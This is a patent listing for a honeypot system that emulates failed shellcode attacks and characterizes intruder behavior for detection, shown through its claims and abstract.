Emulating shellcode attacks
First Claim
1. A method comprising:
- receiving, by a target system from an intruder system, a shellcode including executable and operational instructions effective, when executed, to cause vulnerable software to receive and execute instructions using the shellcode, the vulnerable software including at least one of a service and an application, the target system not hosting the vulnerable software;
detecting, by the target system, failure of installation of the shellcode on the target system; and
in response to detecting failure of installation of the shellcode on the target system, performing (a) through (g), wherein (a) through (g) include(a) identifying, by the target system, a type of the shellcode;
(b) selecting, by the target system, a shellcode emulator corresponding to the type of the shellcode, the target system not being vulnerable to the type of the shell code;
(c) at least one of (i) binding the shellcode emulator to a port indicated by the shellcode and (ii) connecting the shellcode emulator to the intruder system;
(d) receiving, by the target system, instructions from the intruder system directed to the shellcode, the shell code having failed to install on the target system;
(e) executing, by the target system, the instructions by the shellcode emulator effective to simulate successful installation of the shellcode;
(f) characterizing, by a detection system, behavior of the shellcode according to the instructions to generate a shellcode characterization; and
(g) transmitting, by the detection system, the characterization to a plurality of computer systems.
3 Assignments
0 Petitions
Accused Products
Abstract
A system includes one or more “BotMagnet” modules that are exposed to infection by malicious code. The BotMagnets may include one or more virtual machines hosing operating systems in which malicious code may be installed and executed without exposing sensitive data or other parts of a network. In particular, outbound traffic may be transmitted to a Sinkhole module that implements a service requested by the outbound traffic and transmits responses to the malicious code executing within the BotMagnet. In the case of shellcode attacks, unsuccessful attacks may be emulated by selecting a corresponding emulator that will receive and execute instructions, as would a successful shellcode attack. Events occurring on the BotMagnet and Sinkhole are correlated and used to characterize the malicious code. The characterization may be transmitted to other computer systems in order to detect instances of the malicious code.
32 Citations
20 Claims
-
1. A method comprising:
-
receiving, by a target system from an intruder system, a shellcode including executable and operational instructions effective, when executed, to cause vulnerable software to receive and execute instructions using the shellcode, the vulnerable software including at least one of a service and an application, the target system not hosting the vulnerable software; detecting, by the target system, failure of installation of the shellcode on the target system; and in response to detecting failure of installation of the shellcode on the target system, performing (a) through (g), wherein (a) through (g) include (a) identifying, by the target system, a type of the shellcode; (b) selecting, by the target system, a shellcode emulator corresponding to the type of the shellcode, the target system not being vulnerable to the type of the shell code; (c) at least one of (i) binding the shellcode emulator to a port indicated by the shellcode and (ii) connecting the shellcode emulator to the intruder system; (d) receiving, by the target system, instructions from the intruder system directed to the shellcode, the shell code having failed to install on the target system; (e) executing, by the target system, the instructions by the shellcode emulator effective to simulate successful installation of the shellcode; (f) characterizing, by a detection system, behavior of the shellcode according to the instructions to generate a shellcode characterization; and (g) transmitting, by the detection system, the characterization to a plurality of computer systems. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10)
-
-
11. A system comprising one or more processors and one or more memory devices storing executable and operational code, the executable and operational code effective to cause the one or more processors to:
-
receive, from an intruder system, a shellcode including executable and operational instructions effective, when executed, to cause the target system to execute a shell for receiving and executing instructions on the target system; determine failure of installation of the shellcode on the target system due to the target system not being vulnerable to the shellcode; and in response to failure of installation of the shellcode on the target system performing (a) through (f), wherein (a) through (f) include (a) identify a type of the shellcode; (b) select a shellcode emulator corresponding to the type of the shellcode; (c) receive instructions from the intruder system directed to the shellcode, the shellcode not installed on the system; (d) execute the instructions by the shellcode emulator; (e) characterize behavior of the shellcode according to the instructions to generate a shellcode characterization; and (f) transmit the characterization to a plurality of computer systems. - View Dependent Claims (12, 13, 14, 15, 16, 17, 18, 19, 20)
-
Specification